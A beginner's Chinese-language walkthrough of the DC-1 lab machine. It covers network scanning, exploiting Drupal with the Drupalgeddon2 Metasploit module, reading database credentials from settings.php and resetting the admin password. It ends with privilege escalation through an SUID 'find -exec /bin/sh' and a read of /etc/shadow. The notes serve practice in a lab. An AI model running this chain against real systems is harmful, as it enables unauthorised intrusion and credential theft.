菜鸟打靶日记+1
dc1靶场笔记
首先把VM和box的网卡设置好,不然扫不到靶机
arp-scan -I eth0 -l (指定网卡扫)
masscan 192.168.184.0/24 -p 80,22( masscan 扫描的网段 -p 扫描端口号)
1.信息收集
-
msf搜索漏洞
-
mysql相关查询
find提权
端口扫描,用nmap扫描端口
nmap -A -sV -T4 -p- 靶机ip
-A 全面扫描指定ip或域名的所有端口及其目标系统信息等。所需时间较长
-sV 版本探测 通过相应的端口对应相应的服务,根据服务指纹识别出相应的版本
-T4 快速扫描,常用的扫描方式,前提是需要在网络好的环境中进行扫描
-p 扫描端口号
发现有22和80端口,优先80端口
发现是drupal系统,可以进行漏洞利用
进入msf
msfconsole
搜索drupal的漏洞
search drupal
使用该模块
use exploit/unix/webapp/drupal_drupalgeddon2
查看需要设置的参数
show options
exploit run
反弹shell run和exploit都可以进行反弹shell
shell exploit
用本地shell实现交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
用ls查看目录 里面有flag 用cat查看flag
ls flag.txt
cat flag.txt
flag提示
Every good CMS needs a config file - and so do you.
每一个好的CMS都需要一个配置文件-你也是
查找drupal cms的配置文件
cat sites/default/settings.php
需要登录数据库,直接mysql行不通,进入交互式shell
mysql -udbuser -pR0ck3t
查看数据库
show databases;
使用drupldb这个数据库
use drupaldb;
查看当前数据库的表
show tables;
查看users表内的内容
select * from users;
列出表内指定的数据
select name,pass,mail from users;
找到目录下的脚本
加密字符串
./scripts/password-hash.sh 123456
将原来字符串的密码改成加密的字符串
update users set pass="zhifuchuan" where uid=1;
成功后进行网站登录
找到flag3
提示特殊的PERMS 将帮助查找passwd - 但是您需要-exec 该命令来确定如何获取shadow中的内容。
whoami查看权限发现sudo无命令需要su
使用find / -perm -4000查找系统所有文件中拥有suid特殊权限的文件
使用find提权
find authorze.php -exec '/bin/sh' \;
根据flag3提示去查看showdow获取信息
cat /etc/shadow
寻找最后一个flag
cd /root
ls